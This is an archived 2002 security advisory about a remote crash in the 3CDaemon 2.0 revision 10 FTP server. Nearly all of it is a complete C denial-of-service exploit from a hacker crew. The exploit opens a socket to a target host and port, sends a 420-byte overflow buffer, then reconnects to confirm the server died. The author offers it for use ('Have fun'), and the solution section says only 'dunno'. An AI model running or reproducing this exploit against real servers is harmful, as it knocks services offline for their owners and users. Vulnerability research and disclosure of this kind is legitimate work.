2nd May 2002 [SBWID-5322]
COMMAND
3Cdaemon remote DoS
SYSTEMS AFFECTED
3Cdaemon 2.0 revision 10
PROBLEM
MaD SKiLL \'H\' [http://www.madskill.tk] says :
When 400+ chars are sent to the FTP server, it crashes imediatly.
Sample :
========
/* MaD SKiLL \'H\'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
* 1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it\'s a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they\'re send.
*
* Tested on:
* [OS] [version]
* Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
*
* ###
* ##### #### ##
* ###### ###### ######
* ###### ######## ######## ######## ######
* ###### ####### ### ########### ######## #######
* ###### ######## #### ############ ######## #######
* ############### ##### ############ ####### #######
* ############## ###### ############ ####### #######
* ############## ####### ########### ###### #######
* ############# ######## ### ######## ###### #########
* ############ ### #### ### ####### #################
* ##### ############### ########## #################
* ### ######### ##### ######### ################
* #### ######### ##### ######### ################
* ### ######### ############# ################
* ## ######### ###### ###### #######
* ### #### ###### #######
* ###### ########
* ###### ########
* #### ## ###### ### ### ### ###### ########
* ####### ######## ### #### ##### ##### #######
* ############### ### #### ##### ##### #######
* ####### ######## #### ##### ## ###
* ###### ######### #### #### #####
* ##### ######## #### #### ####
* ###### ######## #### #### ### #### ##
* ########## ### #### #### ########## ######
* ######### ### ###########################
* ########## ######## #####################
* ############# ###### ########## ##########
* ######## ##### #### ### ### ### ###
*
* I don\'t know if this will work on versions other then the one I tested it
on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam,
frodo, maxxo,
* xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim (skyrim@m4dskill.tk)
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define BOFSIZE 420
char banner(void) { printf(\"MaD SKiLL \'H\' 3CDaemon 2.0 revision 10
DoS\\n.:[MsH]:.\\n ---\\n\"); }
void E(char *msg) { perror(msg); exit(1); }
main(int argc, char *argv[])
{
static char ownage[BOFSIZE];
int sockfd, sockfd2, n;
struct sockaddr_in server_addr;
struct hostent *server;
if (argc != 3) {
fprintf(stderr,\"Usage: %s hostname/ip port\\n\", argv[0]);
exit(1);
}
banner();
memset(ownage, \'A\', BOFSIZE);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) E(\"Error occured during opening socket\");
server = gethostbyname(argv[1]);
if (server == NULL) E(\"Error occured during host lookup -No such
host?-\\n\");
bzero((char *) &server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,
(char *)&server_addr.sin_addr.s_addr,
server->h_length);
server_addr.sin_port = htons(atoi(argv[2]));
printf(\"Connecting to target FTP server... \");
if (connect(sockfd,&server_addr,sizeof(server_addr)) < 0) { E(\"Error
occured during connecting\\n\"); }
printf(\"Connected, Probing BOF... \\n\");
n = write(sockfd,ownage,strlen(ownage));
if (n < 0) { E(\"Error occured during writing to socket\"); }
close(sockfd);
sockfd2=socket(AF_INET, SOCK_STREAM, 0);
printf(\"Done, checking if server is dead.. \\n\");
sleep(5);
if (connect(sockfd2,&server_addr,sizeof(server_addr)) < 0) {
printf(\"Couldn\'t establish connection: It seems like it died! =)\\n\");
exit(0); }
printf(\"Server is still alive. Perhaps its not vulnerable?\\n\");
return 0;
}
SOLUTION
dunno
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
